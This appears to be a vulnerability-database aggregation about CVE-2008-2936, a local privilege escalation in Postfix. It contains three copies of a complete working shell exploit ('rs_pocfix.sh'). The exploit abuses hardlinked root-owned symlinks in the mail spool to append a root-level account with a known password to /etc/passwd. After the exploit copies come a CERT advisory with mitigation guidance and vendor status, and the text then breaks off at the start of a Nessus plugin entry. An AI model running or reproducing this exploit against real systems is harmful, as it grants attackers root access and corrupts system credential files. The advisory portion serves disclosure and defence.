"type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2936"], "modified": "2008-08-31T00:00:00", "id": "EXPLOITPACK:2DEE05799E2429D8CD17202F417BE030", "href": "", "sourceData": "#!/bin/sh\n#\n# \"rs_pocfix.sh\" (PoC for Postfix local root vulnerability: CVE-2008-2936)\n# by Roman Medina-Heigl Hernandez a.k.a. 
RoMaNSoFt <roman@rs-labs.com>\n#\n# Tested: Ubuntu / Debian\n#\n# [ Madrid, 30.Aug.2008 ]\n#\n\n# Config\n\nwritable_dir=/tmp\nspool_dir=/var/mail\t\t# Use \"postconf mail_spool_directory\" to obtain this\nuser=root\ntarget=/etc/passwd\nuseful_link=/usr/bin/atq\t# lrwxrwxrwx 2 root root 2 2007-05-04 22:15 /usr/bin/atq -> at\nuseful_link_dst=at\t\t# Tip: find / -type l -uid 0 -print -exec ls -l {} \\; | less\nseconds=3\nuser_in_passwd=\"dsr:3GsXLdEaKaGnM:0:0:root:/root:/bin/sh\" # Pass is \"dsrrocks\"\npostfix=`which postfix`\t\t# /usr/sbin/postfix\npostconf=/usr/sbin/postconf\npostmap=/usr/sbin/postmap\n\n\n# Funcs\n\nquit()\n{\n echo \"$1\"\n exit\n}\n\n\n# Step 1: is my system vulnerable?\n\nhead -n 9 $0 | tail -n 8\nif [ $postfix ] ; then\n echo \"[*] Postfix seems to be installed\"\nelse\n quit \"[!] Are you sure Postfix is installed?\"\nfi\n\nmkdir -p $writable_dir/pocfix\ntouch $writable_dir/pocfix/src\nln -s $writable_dir/pocfix/src $writable_dir/pocfix/dst1\nln $writable_dir/pocfix/dst1 $writable_dir/pocfix/dst2\n\nif [ -L $writable_dir/pocfix/dst2 ] ; then\n echo \"[*] Hardlink to symlink not dereferenced\"\n rm -rf $writable_dir/pocfix\nelse\n rm -rf $writable_dir/pocfix\n quit \"[!] Hardlink to symlink correctly dereferenced. System is not vulnerable\"\nfi\n\nif [ -d $spool_dir -a -w $spool_dir ] ; then\n echo \"[*] Spool dir is writable\"\nelse\n quit \"[!] Spool dir is not writable\"\nfi\n\nif [ -e $spool_dir/$user ] ; then\n rm -f $spool_dir/$user\n echo \"[*] Mailbox for \\\"$user\\\" found. Trying to delete it\"\n\n if [ -e $spool_dir/$user ] ; then\n quit \"[!] Couldn't delete it\"\n else\n echo \"[*] Deletion ok\"\n fi\n\nfi\n\nif [ -e $spool_dir/$useful_link_dst ] ; then\n rm -f $spool_dir/$useful_link_dst\n echo \"[*] Mailbox for \\\"$useful_link_dst\\\" found. Trying to delete it\"\n\n if [ -e $spool_dir/$useful_link_dst ] ; then\n quit \"[!] 
Couldn't delete it\"\n else\n echo \"[*] Deletion ok\"\n fi\n\nfi\n\naliases=`$postconf alias_database | cut -d\"=\" -f2`\n$postconf alias_maps | grep -q $aliases\nif [ $? -eq 0 ] ; then\n if [ $aliases ] ; then\n $postmap -q $user $aliases > /dev/null\n if [ $? -eq 0 ] ; then\n quit \"[!] Mail alias for \\\"$user\\\" exists\"\n fi\n fi\nfi\n\nlda=`$postconf mailbox_command | cut -d\"=\" -f2`\nif [ $lda ] ; then\n quit \"[!] Non-Postfix LDA detected\"\nfi \n\n$postconf home_mailbox | grep -q '/$'\nif [ $? -eq 0 ] ; then\n quit \"[!] Maildir-style mailbox detected\"\nfi\n\n\n# Step 2: Exploiting\n\nln -f $useful_link $spool_dir/$user 2> /dev/null || quit \"[!] Couldn't create hardlink (different partitions?)\"\nln -s -f $target $spool_dir/$useful_link_dst 2> /dev/null || quit \"[!] Couldn't create symlink pointing to target file\"\ncp -f $target $writable_dir/pocfix_target_backup.$$ && echo \"[*] Backed up: $target (saved as \\\"$writable_dir/pocfix_target_backup.$$\\\")\"\necho \"[*] Sending mail ($seconds seconds wait)\"\necho $user_in_passwd | /usr/sbin/sendmail $user\n\nsleep $seconds\n\ndiff -q $target $writable_dir/pocfix_target_backup.$$ > /dev/null\n\nif [ $? -eq 0 ] ; then\n echo \"[!] Exploit failed\"\nelse\n echo \"[*] Exploit successful (appended data to $target). 
Now \\\"su dsr\\\", pass is \\\"dsrrocks\\\")\"\nfi\n\nrm -f $spool_dir/$user\nrm -f $spool_dir/$useful_link_dst\n\n# milw0rm.com [2008-08-31]", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T21:31:54", "description": "No description provided by source.", "published": "2008-08-31T00:00:00", "title": "Postfix <= 2.6-20080814 (symlink) Local Privilege Escalation Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2936"], "modified": "2008-08-31T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-17321", "id": "SSV:17321", "sourceData": "\n #!/bin/sh\n#\n# "rs_pocfix.sh" (PoC for Postfix local root vulnerability: CVE-2008-2936)\n# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt <roman@rs-labs.com>\n#\n# Tested: Ubuntu / Debian\n#\n# [ Madrid, 30.Aug.2008 ]\n#\n\n# Config\n\nwritable_dir=/tmp\nspool_dir=/var/mail\t\t# Use "postconf mail_spool_directory" to obtain this\nuser=root\ntarget=/etc/passwd\nuseful_link=/usr/bin/atq\t# lrwxrwxrwx 2 root root 2 2007-05-04 22:15 /usr/bin/atq -> at\nuseful_link_dst=at\t\t# Tip: find / -type l -uid 0 -print -exec ls -l {} \\; | less\nseconds=3\nuser_in_passwd="dsr:3GsXLdEaKaGnM:0:0:root:/root:/bin/sh" # Pass is "dsrrocks"\npostfix=`which postfix`\t\t# /usr/sbin/postfix\npostconf=/usr/sbin/postconf\npostmap=/usr/sbin/postmap\n\n\n# Funcs\n\nquit()\n{\n echo "$1"\n exit\n}\n\n\n# Step 1: is my system vulnerable?\n\nhead -n 9 $0 | tail -n 8\nif [ $postfix ] ; then\n echo "[*] Postfix seems to be installed"\nelse\n quit "[!] Are you sure Postfix is installed?"\nfi\n\nmkdir -p $writable_dir/pocfix\ntouch $writable_dir/pocfix/src\nln -s $writable_dir/pocfix/src $writable_dir/pocfix/dst1\nln $writable_dir/pocfix/dst1 $writable_dir/pocfix/dst2\n\nif [ -L $writable_dir/pocfix/dst2 ] ; then\n echo "[*] Hardlink to symlink not dereferenced"\n rm -rf $writable_dir/pocfix\nelse\n rm -rf $writable_dir/pocfix\n quit "[!] 
Hardlink to symlink correctly dereferenced. System is not vulnerable"\nfi\n\nif [ -d $spool_dir -a -w $spool_dir ] ; then\n echo "[*] Spool dir is writable"\nelse\n quit "[!] Spool dir is not writable"\nfi\n\nif [ -e $spool_dir/$user ] ; then\n rm -f $spool_dir/$user\n echo "[*] Mailbox for \\"$user\\" found. Trying to delete it"\n\n if [ -e $spool_dir/$user ] ; then\n quit "[!] Couldn't delete it"\n else\n echo "[*] Deletion ok"\n fi\n\nfi\n\nif [ -e $spool_dir/$useful_link_dst ] ; then\n rm -f $spool_dir/$useful_link_dst\n echo "[*] Mailbox for \\"$useful_link_dst\\" found. Trying to delete it"\n\n if [ -e $spool_dir/$useful_link_dst ] ; then\n quit "[!] Couldn't delete it"\n else\n echo "[*] Deletion ok"\n fi\n\nfi\n\naliases=`$postconf alias_database | cut -d"=" -f2`\n$postconf alias_maps | grep -q $aliases\nif [ $? -eq 0 ] ; then\n if [ $aliases ] ; then\n $postmap -q $user $aliases > /dev/null\n if [ $? -eq 0 ] ; then\n quit "[!] Mail alias for \\"$user\\" exists"\n fi\n fi\nfi\n\nlda=`$postconf mailbox_command | cut -d"=" -f2`\nif [ $lda ] ; then\n quit "[!] Non-Postfix LDA detected"\nfi \n\n$postconf home_mailbox | grep -q '/$'\nif [ $? -eq 0 ] ; then\n quit "[!] Maildir-style mailbox detected"\nfi\n\n\n# Step 2: Exploiting\n\nln -f $useful_link $spool_dir/$user 2> /dev/null || quit "[!] Couldn't create hardlink (different partitions?)"\nln -s -f $target $spool_dir/$useful_link_dst 2> /dev/null || quit "[!] Couldn't create symlink pointing to target file"\ncp -f $target $writable_dir/pocfix_target_backup.$$ && echo "[*] Backed up: $target (saved as \\"$writable_dir/pocfix_target_backup.$$\\")"\necho "[*] Sending mail ($seconds seconds wait)"\necho $user_in_passwd | /usr/sbin/sendmail $user\n\nsleep $seconds\n\ndiff -q $target $writable_dir/pocfix_target_backup.$$ > /dev/null\n\nif [ $? -eq 0 ] ; then\n echo "[!] Exploit failed"\nelse\n echo "[*] Exploit successful (appended data to $target). 
Now \\"su dsr\\", pass is \\"dsrrocks\\")"\nfi\n\nrm -f $spool_dir/$user\nrm -f $spool_dir/$useful_link_dst\n\n# milw0rm.com [2008-08-31]\n\n ", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-17321"}, {"lastseen": "2017-11-19T15:41:39", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Postfix <= 2.6-20080814 - (symlink) Local Privilege Escalation Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2936"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-65680", "id": "SSV:65680", "sourceData": "\n #!/bin/sh\r\n#\r\n# "rs_pocfix.sh" (PoC for Postfix local root vulnerability: CVE-2008-2936)\r\n# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt <roman@rs-labs.com>\r\n#\r\n# Tested: Ubuntu / Debian\r\n#\r\n# [ Madrid, 30.Aug.2008 ]\r\n#\r\n\r\n# Config\r\n\r\nwritable_dir=/tmp\r\nspool_dir=/var/mail\t\t# Use "postconf mail_spool_directory" to obtain this\r\nuser=root\r\ntarget=/etc/passwd\r\nuseful_link=/usr/bin/atq\t# lrwxrwxrwx 2 root root 2 2007-05-04 22:15 /usr/bin/atq -> at\r\nuseful_link_dst=at\t\t# Tip: find / -type l -uid 0 -print -exec ls -l {} \\; | less\r\nseconds=3\r\nuser_in_passwd="dsr:3GsXLdEaKaGnM:0:0:root:/root:/bin/sh" # Pass is "dsrrocks"\r\npostfix=`which postfix`\t\t# /usr/sbin/postfix\r\npostconf=/usr/sbin/postconf\r\npostmap=/usr/sbin/postmap\r\n\r\n\r\n# Funcs\r\n\r\nquit()\r\n{\r\n echo "$1"\r\n exit\r\n}\r\n\r\n\r\n# Step 1: is my system vulnerable?\r\n\r\nhead -n 9 $0 | tail -n 8\r\nif [ $postfix ] ; then\r\n echo "[*] Postfix seems to be installed"\r\nelse\r\n quit "[!] 
Are you sure Postfix is installed?"\r\nfi\r\n\r\nmkdir -p $writable_dir/pocfix\r\ntouch $writable_dir/pocfix/src\r\nln -s $writable_dir/pocfix/src $writable_dir/pocfix/dst1\r\nln $writable_dir/pocfix/dst1 $writable_dir/pocfix/dst2\r\n\r\nif [ -L $writable_dir/pocfix/dst2 ] ; then\r\n echo "[*] Hardlink to symlink not dereferenced"\r\n rm -rf $writable_dir/pocfix\r\nelse\r\n rm -rf $writable_dir/pocfix\r\n quit "[!] Hardlink to symlink correctly dereferenced. System is not vulnerable"\r\nfi\r\n\r\nif [ -d $spool_dir -a -w $spool_dir ] ; then\r\n echo "[*] Spool dir is writable"\r\nelse\r\n quit "[!] Spool dir is not writable"\r\nfi\r\n\r\nif [ -e $spool_dir/$user ] ; then\r\n rm -f $spool_dir/$user\r\n echo "[*] Mailbox for \\"$user\\" found. Trying to delete it"\r\n\r\n if [ -e $spool_dir/$user ] ; then\r\n quit "[!] Couldn't delete it"\r\n else\r\n echo "[*] Deletion ok"\r\n fi\r\n\r\nfi\r\n\r\nif [ -e $spool_dir/$useful_link_dst ] ; then\r\n rm -f $spool_dir/$useful_link_dst\r\n echo "[*] Mailbox for \\"$useful_link_dst\\" found. Trying to delete it"\r\n\r\n if [ -e $spool_dir/$useful_link_dst ] ; then\r\n quit "[!] Couldn't delete it"\r\n else\r\n echo "[*] Deletion ok"\r\n fi\r\n\r\nfi\r\n\r\naliases=`$postconf alias_database | cut -d"=" -f2`\r\n$postconf alias_maps | grep -q $aliases\r\nif [ $? -eq 0 ] ; then\r\n if [ $aliases ] ; then\r\n $postmap -q $user $aliases > /dev/null\r\n if [ $? -eq 0 ] ; then\r\n quit "[!] Mail alias for \\"$user\\" exists"\r\n fi\r\n fi\r\nfi\r\n\r\nlda=`$postconf mailbox_command | cut -d"=" -f2`\r\nif [ $lda ] ; then\r\n quit "[!] Non-Postfix LDA detected"\r\nfi \r\n\r\n$postconf home_mailbox | grep -q '/$'\r\nif [ $? -eq 0 ] ; then\r\n quit "[!] Maildir-style mailbox detected"\r\nfi\r\n\r\n\r\n# Step 2: Exploiting\r\n\r\nln -f $useful_link $spool_dir/$user 2> /dev/null || quit "[!] Couldn't create hardlink (different partitions?)"\r\nln -s -f $target $spool_dir/$useful_link_dst 2> /dev/null || quit "[!] 
Couldn't create symlink pointing to target file"\r\ncp -f $target $writable_dir/pocfix_target_backup.$$ && echo "[*] Backed up: $target (saved as \\"$writable_dir/pocfix_target_backup.$$\\")"\r\necho "[*] Sending mail ($seconds seconds wait)"\r\necho $user_in_passwd | /usr/sbin/sendmail $user\r\n\r\nsleep $seconds\r\n\r\ndiff -q $target $writable_dir/pocfix_target_backup.$$ > /dev/null\r\n\r\nif [ $? -eq 0 ] ; then\r\n echo "[!] Exploit failed"\r\nelse\r\n echo "[*] Exploit successful (appended data to $target). Now \\"su dsr\\", pass is \\"dsrrocks\\")"\r\nfi\r\n\r\nrm -f $spool_dir/$user\r\nrm -f $spool_dir/$useful_link_dst\r\n\r\n# milw0rm.com [2008-08-31]\r\n\n ", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-65680"}], "cert": [{"lastseen": "2020-09-18T20:41:14", "bulletinFamily": "info", "cvelist": ["CVE-2008-2936"], "description": "### Overview \n\nThe Postfix MTA contains a local privilege escalation vulnerability.\n\n### Description \n\nPostfix is an mail transport agent (`MTA`) that is used by several Unix-like operating systems. Symbolic links and hard links are types of files that reference other files. Unlike hard links, symbolic links can point to directories and use relative pathnames.\n\nOn some non-POSIX.1-2001 and X/Open XPG4v2 compliant systems, users can hardlink symlinks which are owned by the root user. Postfix allows root-owned symlinks to be used as a mail destination folder. A hard link to a Postfix root-owned symlink could point to a file that can be overwritten by Postfix, regardless of the permissions of the destination file. \n \n--- \n \n### Impact \n\nA local, authenticated attacker may be able to overwrite arbitrary files, possibly gaining elevated privileges. \n \n--- \n \n### Solution \n\n**Upgrade** \nSee <http://article.gmane.org/gmane.mail.postfix.announce/110> for information about obtaining updated software. 
Users who do not compile Postfix from source should see the systems affected section below for a partial list of affected vendors. \n \n--- \n \n \n**Set mailbox permissions** \n \nMaking the system mail spool directory root-owned may mitigate this vulnerability. See <http://article.gmane.org/gmane.mail.postfix.announce/110> for specific information about this and other workarounds. \n \n--- \n \n### Vendor Information\n\n938323\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Gentoo Linux __ Affected\n\nNotified: August 01, 2008 Updated: August 18, 2008 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee <http://www.gentoo.org/security/en/glsa/glsa-200808-12.xml> for more information.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23938323 Feedback>).\n\n### Mandriva, Inc. 
__ Affected\n\nNotified: August 01, 2008 Updated: August 18, 2008 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee <http://archives.mandrivalinux.com/security-announce/2008-08/msg00014.php> for more information.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23938323 Feedback>).\n\n### SUSE Linux __ Affected\n\nNotified: August 01, 2008 Updated: August 18, 2008 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee <http://lists.opensuse.org/opensuse-security-announce/2008-08/msg00002.html> for more information.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23938323 Feedback>).\n\n### Ubuntu __ Affected\n\nNotified: August 01, 2008 Updated: August 19, 2008 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee <http://www.ubuntu.com/usn/usn-74-2> for more details.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23938323 Feedback>).\n\n### DragonFly BSD Project Not Affected\n\nNotified: August 01, 2008 Updated: August 02, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further 
information regarding this vulnerability.\n\n### Sun Microsystems, Inc. __ Not Affected\n\nNotified: August 01, 2008 Updated: August 19, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nSun products do not bundle the Postfix mailer and hence we are not affected by this issue.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSun systems with third party or unofficial Postfix packages (<http://www.postfix.org/packages.html>) may be vulnerable. \n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23938323 Feedback>).\n\n### Apple Computer, Inc. Unknown\n\nNotified: August 01, 2008 Updated: August 19, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Conectiva Inc. Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Cray Inc. 
Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Debian GNU/Linux Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### EMC Corporation Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Engarde Secure Linux Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### F5 Networks, Inc. Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fedora Project Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### FreeBSD, Inc. 
Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fujitsu Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hewlett-Packard Company Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hitachi Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM Corporation Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM Corporation (zseries) Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM eServer Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from 
the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Ingrian Networks, Inc. Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Juniper Networks, Inc. Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Microsoft Corporation Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### MontaVista Software, Inc. 
Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NEC Corporation Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NetBSD Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Nokia Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Novell, Inc. Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Openwall GNU/*/Linux Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### QNX, Software Systems, Inc. 
Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Red Hat, Inc. Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Silicon Graphics, Inc. Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Slackware Linux Inc. Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sony Corporation Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### The SCO Group Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Turbolinux Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement 
from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Unisys Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Wind River Systems, Inc. Unknown\n\nNotified: August 01, 2008 Updated: August 01, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\nView all 39 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <ftp://ftp.porcupine.org/mirrors/postfix-release/index/html>\n * <http://article.gmane.org/gmane.mail.postfix.announce/110>\n * <http://linuxgazette.net/105/pitcher.html>\n * <http://en.wikipedia.org/wiki/Hard_links>\n * <http://en.wikipedia.org/wiki/Symbolic_link>\n\n### Acknowledgements\n\nThanks to Wietse Venema for information that was used in this report. 
Sebastian Krahmer of SuSE is credited for discovering and reporting this issue.\n\nThis document was written by Ryan Giobbi.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2008-2936](<http://web.nvd.nist.gov/vuln/detail/CVE-2008-2936>) \n---|--- \n**Severity Metric:** | 4.20 \n**Date Public:** | 2008-08-18 \n**Date First Published:** | 2008-08-18 \n**Date Last Updated: ** | 2008-08-19 14:52 UTC \n**Document Revision: ** | 20 \n", "modified": "2008-08-19T14:52:00", "published": "2008-08-18T00:00:00", "id": "VU:938323", "href": "https://www.kb.cert.org/vuls/id/938323", "type": "cert", "title": "Postfix local privilege escalation", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-07T11:51:56", "description": "Sebastian Krahmer of the SUSE Security Team discovered a flaw in the\nway Postfix dereferenced symbolic links. If a local user had write\naccess to a mail spool directory without a root mailbox file, it could\nbe possible for them to append arbitrary data to files that root had\nwrite permissions to (CVE-2008-2936).\n\nThe updated packages have been patched to correct this issue.", "edition": 25, "published": "2009-04-23T00:00:00", "title": "Mandriva Linux Security Advisory : postfix (MDVSA-2008:171)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "modified": "2009-04-23T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:postfix-pcre", "cpe:/o:mandriva:linux:2007.1", "cpe:/o:mandriva:linux:2008.1", "p-cpe:/a:mandriva:linux:postfix-pgsql", "cpe:/o:mandriva:linux:2008.0", "p-cpe:/a:mandriva:linux:postfix", "p-cpe:/a:mandriva:linux:libpostfix1", "p-cpe:/a:mandriva:linux:postfix-mysql", "p-cpe:/a:mandriva:linux:lib64postfix1", "p-cpe:/a:mandriva:linux:postfix-ldap"], "id": "MANDRIVA_MDVSA-2008-171.NASL", "href": "https://www.tenable.com/plugins/nessus/37883", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this 
